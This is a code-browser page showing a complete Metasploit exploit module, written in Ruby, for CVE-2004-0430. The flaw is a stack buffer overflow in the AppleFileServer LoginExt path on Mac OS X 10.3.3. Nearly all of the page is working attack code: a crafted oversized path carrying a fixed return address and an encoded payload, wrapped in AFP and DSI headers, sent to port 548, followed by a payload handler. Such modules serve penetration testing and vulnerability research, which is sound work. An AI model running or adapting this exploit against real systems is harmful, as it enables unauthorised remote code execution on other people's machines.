root / modules / exploits / osx / afp / loginext.rb @ master
History | View | Annotate | Download (2.5 kB)
| 1 |
##
|
|---|---|
| 2 |
# $Id$
|
| 3 |
##
|
| 4 |
|
| 5 |
##
|
| 6 |
# This file is part of the Metasploit Framework and may be subject to
|
| 7 |
# redistribution and commercial restrictions. Please see the Metasploit
|
| 8 |
# Framework web site for more information on licensing and terms of use.
|
| 9 |
# http://metasploit.com/framework/
|
| 10 |
##
|
| 11 |
|
| 12 |
require 'msf/core'
|
| 13 |
|
| 14 |
class Metasploit3 < Msf::Exploit::Remote |
| 15 |
Rank = AverageRanking |
| 16 |
|
| 17 |
include Msf::Exploit::Remote::Tcp |
| 18 |
|
| 19 |
def initialize(info = {}) |
| 20 |
super(update_info(info,
|
| 21 |
'Name' => 'AppleFileServer LoginExt PathName Overflow', |
| 22 |
'Description' => %q{ |
| 23 |
This module exploits a stack buffer overflow in the AppleFileServer service |
| 24 |
on MacOS X. This vulnerability was originally reported by Atstake and |
| 25 |
was actually one of the few useful advisories ever published by that |
| 26 |
company. You only have one chance to exploit this bug. |
| 27 |
This particular exploit uses a stack-based return address that will |
| 28 |
only work under optimal conditions. |
| 29 |
},
|
| 30 |
'Author' => 'hdm', |
| 31 |
'License' => MSF_LICENSE, |
| 32 |
'Version' => '$Revision$', |
| 33 |
'References' =>
|
| 34 |
[ |
| 35 |
[ 'CVE', '2004-0430'], |
| 36 |
[ 'OSVDB', '5762'], |
| 37 |
[ 'BID', '10271'], |
| 38 |
], |
| 39 |
'Payload' =>
|
| 40 |
{
|
| 41 |
'Space' => 512, |
| 42 |
'BadChars' => "\x00\x20", |
| 43 |
'MinNops' => 128, |
| 44 |
'Compat' =>
|
| 45 |
{
|
| 46 |
'ConnectionType' => "+find" |
| 47 |
} |
| 48 |
}, |
| 49 |
'Targets' =>
|
| 50 |
[ |
| 51 |
# Target 0
|
| 52 |
[ |
| 53 |
'Mac OS X 10.3.3',
|
| 54 |
{
|
| 55 |
'Platform' => 'osx', |
| 56 |
'Arch' => ARCH_PPC, |
| 57 |
'Ret' => 0xf0101c0c # stack address :< |
| 58 |
}, |
| 59 |
], |
| 60 |
], |
| 61 |
'DisclosureDate' => 'May 3 2004')) |
| 62 |
|
| 63 |
# Configure the default port to be AFP
|
| 64 |
register_options( |
| 65 |
[ |
| 66 |
Opt::RPORT(548), |
| 67 |
], self.class)
|
| 68 |
end
|
| 69 |
|
| 70 |
def exploit |
| 71 |
connect |
| 72 |
|
| 73 |
print_status("Trying target #{target.name}...")
|
| 74 |
|
| 75 |
path = "\xff" * 1024 |
| 76 |
path[168, 4] = Rex::Arch.pack_addr(target.arch, target.ret) |
| 77 |
path[172, payload.encoded.length] = payload.encoded
|
| 78 |
|
| 79 |
# The AFP header
|
| 80 |
afp = "\x3f\x00\x00\x00"
|
| 81 |
|
| 82 |
# Add the authentication methods
|
| 83 |
["AFP3.1", "Cleartxt Passwrd"].each { |m| |
| 84 |
afp << [m.length].pack('C') + m
|
| 85 |
} |
| 86 |
|
| 87 |
# Add the user type and afp path
|
| 88 |
afp << "\x03" + [9].pack('n') + rand_text_alphanumeric(9) |
| 89 |
afp << "\x03" + [path.length].pack('n') + path |
| 90 |
|
| 91 |
# Add the data stream interface header
|
| 92 |
dsi = |
| 93 |
[ |
| 94 |
0, # Flags |
| 95 |
2, # Command |
| 96 |
rand(65536), # XID |
| 97 |
0, # Data Offset |
| 98 |
afp.length, # Data Length
|
| 99 |
0 # Reserved |
| 100 |
].pack("CCnNNN") + afp
|
| 101 |
|
| 102 |
sock.put(dsi) |
| 103 |
|
| 104 |
handler |
| 105 |
|
| 106 |
disconnect |
| 107 |
end
|
| 108 |
|
| 109 |
end
|